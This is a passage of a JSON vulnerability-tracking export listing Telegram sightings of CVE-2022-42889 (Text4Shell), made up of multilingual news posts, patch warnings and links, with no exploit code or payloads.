"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/hackprotectsi/72", "content": "https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/", "creation_timestamp": "2022-11-19T16:34:46.000000Z"}, {"uuid": "72b7b67e-04fd-40fb-a6cd-55d7a697d2c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/570", "content": "\ud83d\udca3 \u0647\u0634\u062f\u0627\u0631!\n\n\u067e\u0633 \u0627\u0632 Log4Shell \u0648 Spring4Shell \u062d\u0627\u0644 \u0646\u0648\u0628\u062a Text4Shell\u060c \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062f\u06cc\u06af\u0631\u06cc \u0628\u0627 \u062f\u0631\u062c\u0647 \u0627\u0647\u0645\u06cc\u062a \u062d\u06cc\u0627\u062a\u06cc \u0627\u0633\u062a.\n\n\u0636\u0639\u0641 \u0627\u0645\u0646\u06cc\u062a\u06cc \u06af\u0632\u0627\u0631\u0634 \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 Alvaro Munoz \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 CVE-2022-42889 \u062f\u0631 \u06a9\u062a\u0627\u0628\u062e\u0627\u0646\u0647 (Apache Commons Text) \u0627\u06cc\u0646 \u067e\u0644\u062a\u0641\u0631\u0645\u060c \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f\u0647\u0627\u06cc \u0645\u062e\u0631\u0628 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631(RCE) \u0631\u0627 \u0628\u0631\u0627\u06cc \u0645\u0647\u0627\u062c\u0645 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc \u0646\u0645\u0627\u06cc\u062f.\n\n\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u06a9\u0647 \u0631\u0648\u0632 \u06af\u0630\u0634\u062a\u0647 \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632 9.8 \u0646\u06cc\u0632 \u062b\u0628\u062a \u0646\u0647\u0627\u06cc\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a \u062f\u0631 \u0646\u0633\u062e\u0647  1.10.0 \u0622\u0646\u060c \u0628\u0631 \u0637\u0631\u0641 \u0634\u062f\u0647 \u0648 \u0628\u0646\u06cc\u0627\u062f Apache \u062a\u0627\u06a9\u06cc\u062f \u0628\u0631 \u0628\u0631\u0648\u0632 \u0631\u0633\u0627\u0646\u06cc \u0628\u0627 \u0627\u0648\u0644\u0648\u06cc\u062a \u0628\u0627\u0644\u0627 \u0631\u0627 \u062f\u0627\u0631\u062f.\n\ud83d\udd11 \u0646\u06a9\u062a\u0647: \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0645\u062d\u0628\u0648\u0628\u06cc\u062a \u0627\u06cc\u0646 \u067e\u0644\u062a\u0641\u0631\u0645 \u0648 \u06af\u0633\u062a\u0631\u062f\u06af\u06cc \u0633\u0631\u0648\u06cc\u0633 \u062f\u0631 \u06a9\u0646\u0627\u0631 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a\u060c \u0644\u0637\u0641\u0640\u0627 \u0627\u06cc\u0646 \u0628\u0631\u0648\u0632 \u0631\u0633\u0627\u0646\u06cc \u0631\u0627 \u062f\u0631 \u0627\u0633\u0631\u0639 \u0648\u0642\u062a \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u062f.\n\n\u062c\u0632\u0626\u06cc\u0627\u062a \u0628\u06cc\u0634\u062a\u0631: https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/", "creation_timestamp": "2022-11-06T21:29:01.000000Z"}, {"uuid": "d197299d-37be-49f3-834e-fd4ec9e8385e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/breachdetector/358840", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2022-42889: What is Apache Commons Text?\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"14 Oct 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-10-14T10:56:27.000000Z"}, {"uuid": "06b29259-53e8-4900-aab2-c652ca6beacc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/breachdetector/358836", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2022-42889: Apache Commons Text Nedir ?\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"14 Oct 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-10-14T10:56:16.000000Z"}, {"uuid": "0866e5ea-077d-4bec-9288-cad573f51036", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/breachdetector/361914", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"StringSubstitutor \u0130nterpolator CVE-2022-42889 Nedir ?\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"18 Oct 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-10-18T22:25:32.000000Z"}, {"uuid": "4b05c601-8181-42f0-8296-fe9e9f671bba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "Telegram/2cjfQWAOjA_w1W1NarN4CH8PGGPHs1uBt_jIRO1-MYkIVPI", "content": "", "creation_timestamp": "2022-10-26T14:31:16.000000Z"}, {"uuid": "f64fa3a8-4c57-4807-8463-90ecfeb28c93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "Telegram/Qjg05UX1QJftzfsjdSMx43_d70BVn0G5YsuCmpTqNFr9hdg", "content": "", "creation_timestamp": "2022-10-25T07:15:16.000000Z"}, {"uuid": "96b9acb8-243a-4432-94ed-3e034b4e01cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "Telegram/e_oQdWccANNNzJF7DOcKG8GgLKUlpwiZaWnHFypQR5OGNe8", "content": "", "creation_timestamp": "2022-12-21T15:02:04.000000Z"}, {"uuid": "d7e0fb4e-4786-456c-afe0-c5f56ed71415", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/true_secator/4296", "content": "\u0414\u0435\u0441\u044f\u0442\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0437\u0430\u043a\u0440\u044b\u043b\u0430 Juniper Networks, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u0432 \u041e\u0421 Junos \u0438 STRM.\n\n\u0412 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u0435\u0439 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u044b \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0431\u0430\u0433\u0438 \u0432 Expat (libexpat), \u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0435\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 \u0441\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430\u0442\u043e\u0440\u0430 XML, \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u043d\u0430 \u043f\u043e\u0442\u043e\u043a\u0438.\n\n7 \u0438\u0437 15 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0445 \u041e\u0421 Junos \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 Expat \u0438\u043c\u0435\u044e\u0442 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 9,8.\u00a0\u0412\u0441\u0435 \u043e\u043d\u0438 \u0431\u044b\u043b\u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044b \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0434\u0432\u0430 \u0433\u043e\u0434\u0430 \u0438 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043b\u0438 \u043e\u043d\u0438 \u0434\u043b\u044f \u0437\u043b\u043e\u043d\u0430\u043c\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0430\u0442\u0430\u043a.\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0434\u043b\u044f \u0432\u0435\u0440\u0441\u0438\u0439 \u041e\u0421 Junos \u0441 19.4 \u043f\u043e 22.2.\u00a0Juniper \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0441\u043f\u0438\u0441\u043a\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438\u043b\u0438 \u0444\u0438\u043b\u044c\u0442\u0440\u044b \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430, \u0447\u0442\u043e\u0431\u044b \u0441\u043d\u0438\u0437\u0438\u0442\u044c \u0440\u0438\u0441\u043a\u0438, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u044d\u0442\u0438\u043c\u0438 \u043e\u0448\u0438\u0431\u043a\u0430\u043c\u0438.\n\nJuniper \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0430 \u043e \u0432\u044b\u043f\u0443\u0441\u043a\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 \u0434\u043b\u044f CVE-2022-42889 \u0432 Security Threat Response Manager, \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Apache Commons Text, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0435\u0439 \u043a RCE.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0438\u0445 \u041e\u0421 Junos \u0438 \u041e\u0421 Junos Evolved, \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044e \u043a\u043e\u043c\u0430\u043d\u0434 \u0438 RCE.\n\n\u0414\u0432\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u041e\u0421 Junos Evolved \u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0441 \u043d\u0438\u0437\u043a\u0438\u043c \u0443\u0440\u043e\u0432\u043d\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0438\u043b\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 root \u0438\u043b\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e.\n\n\u0420\u044f\u0434 \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 Junos OS \u0438 Junos OS Evolved \u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u0437\u0432\u0430\u0442\u044c DoS. \u041e\u0434\u043d\u0430 \u0438\u0437 \u043e\u0448\u0438\u0431\u043e\u043a \u0432 Paragon Active Assurance (\u0440\u0430\u043d\u0435\u0435 Netrounds) \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u0442\u044c \u043e\u0431\u0445\u043e\u0434 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u043f\u0440\u0430\u0432\u0438\u043b \u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0439 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430.\n\nJuniper \u043d\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442 \u043e\u0431 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445.\u00a0\u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435\u00a0\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Juniper Networks.", "creation_timestamp": "2023-04-17T21:00:06.000000Z"}, {"uuid": "b5d25ac8-6508-4b0b-bd8f-39f7e3d37418", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/crackcodes/1271", "content": "Detecting and mitigating CVE-2022-42889 a.k.a. Text4shell\nhttps://ift.tt/4fUISJG\n\nSubmitted October 19, 2022 at 06:48PM by MiguelHzBz\nvia reddit https://ift.tt/q43Vpfy", "creation_timestamp": "2022-10-22T15:35:08.000000Z"}, {"uuid": "2ed89012-bf6b-4056-bfb6-05c08b2f03e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/true_secator/3576", "content": "\u041a\u0435\u0432\u0438\u043d \u0411\u043e\u043c\u043e\u043d\u0434 \u043f\u0440\u0438\u043e\u0442\u043a\u0440\u044b\u043b \u0437\u0430\u0432\u0435\u0441\u0443 \u043d\u043e\u0432\u043e\u0439 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b Act4Shell, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0443\u044e \u0441\u043e\u0431\u043e\u0439 RCE \u0447\u0435\u0440\u0435\u0437 \u0438\u043d\u0442\u0435\u0440\u043f\u043e\u043b\u044f\u0446\u0438\u044e \u0442\u0435\u043a\u0441\u0442\u0430 Apache Commons.\n\nApache Commons Text \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u0438, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0432 \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u044b\u0445 \u0441\u0442\u0440\u043e\u043a\u0430\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 1.5\u20131.9, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u0432 \u043f\u0435\u0440\u0438\u043e\u0434 \u0441 2018 \u043f\u043e 2022 \u0433\u043e\u0434 \u0438 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 pwntester \u0435\u0449\u0435 \u0432 \u043c\u0430\u0440\u0442\u0435 \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\u041e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2022-42889 \u043e\u0448\u0438\u0431\u043a\u0430 \u0438\u043c\u0435\u0435\u0442 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u043e \u0441 log4shell, \u043d\u043e \u043d\u044b\u043d\u0435\u0448\u043d\u0438\u0439 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u043a  \u044f\u0432\u043d\u043e \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u043c\u0435\u043d\u0435\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043a\u043b\u0430\u0441\u0441 InterpolatorStringLookup, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0440\u0435\u0434\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 Java.\n\n\u041d\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e \u0434\u0440\u0443\u0433\u043e\u0435: \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 \u0432\u044b\u0448\u043b\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043d\u0435\u0434\u0435\u043b\u044c \u043d\u0430\u0437\u0430\u0434, \u043d\u043e \u0432 \u0442\u043e \u0432\u0440\u0435\u043c\u044f Apache \u043d\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043b CVE \u0438\u043b\u0438 \u0434\u0430\u0436\u0435 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f. \u0412\u043f\u0440\u043e\u0447\u0435\u043c, \u043a\u0430\u043a \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u043e \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0438\u0447\u0435\u0433\u043e \u0442\u0430\u043a\u0436\u0435 \u043d\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043b\u043e\u0441\u044c: \u043e\u043d\u0438 \u0431\u044b\u043b\u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u044b \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0441 \u0432\u0435\u0440\u0441\u0438\u0438 1.5/1.8 \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 1.10.\n\n\u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u0449\u0435\u0439 \u043e\u0433\u043b\u0430\u0441\u043a\u0438 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0432\u0441\u0435 \u0436\u0435 \u0432\u043d\u0435\u0441 \u0432\u0441\u0435 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u0438\u0432\u044b.\n\n\u0420\u0435\u0437\u044e\u043c\u0438\u0440\u0443\u044f, \u0411\u043e\u043c\u043e\u043d\u0434 \u043a\u043e\u043d\u0441\u0442\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b, \u0447\u0442\u043e \u043e\u0431\u0449\u0438\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b, \u0441\u0442\u043e\u044f\u0449\u0438\u0435 \u0437\u0430 Log4Shell, \u0434\u043e \u043a\u043e\u043d\u0446\u0430 \u043d\u0435 \u0440\u0435\u0448\u0435\u043d\u044b. \u041e\u0442\u0440\u0430\u0441\u043b\u044c \u0432\u044b\u043d\u0443\u0436\u0434\u0435\u043d\u0430 \u043f\u043e\u043b\u0430\u0433\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0445 \u043b\u0438\u0446, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u0432 \u0431\u0443\u0434\u0443\u0449\u0435\u043c.", "creation_timestamp": "2022-10-18T17:10:04.000000Z"}, {"uuid": "6373c351-3965-4cfb-8d36-2e106595ab38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "exploited", "source": "https://t.me/true_secator/3597", "content": "\u0417\u0430\u043a\u043e\u043d\u043e\u043c\u0435\u0440\u043d\u043e \u043f\u043e\u0441\u043b\u0435 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f PoC \u0434\u043b\u044f Text4Shell, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u043e\u0439 \u043a\u0430\u043a CVE-2022-42889, \u043d\u0430\u0447\u0430\u043b\u0438\u0441\u044c \u043f\u0435\u0440\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Apache Commons Text.\n\nApache Commons Text \u2014 \u044d\u0442\u043e \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 Java \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u0430\u044f \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441\u043e \u0441\u0442\u0440\u043e\u043a\u0430\u043c\u0438.\u00a0\u041e\u043d \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043c\u043d\u043e\u0433\u0438\u043c\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430\u043c\u0438 \u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c\u0438.\n\nCVE-2022-42889 \u2014 \u044d\u0442\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043d\u0435\u043d\u0430\u0434\u0435\u0436\u043d\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u043e\u0439 \u0434\u0430\u043d\u043d\u044b\u0445, \u0438 \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a RCE, \u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043e\u0431\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430\u0445.\n\nDefiant \u0432\u043a\u043b\u044e\u0447\u0438\u043b\u0438 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433 4 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u043e\u0432 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0431\u0430\u0433\u0438 17 \u043e\u043a\u0442\u044f\u0431\u0440\u044f \u0438 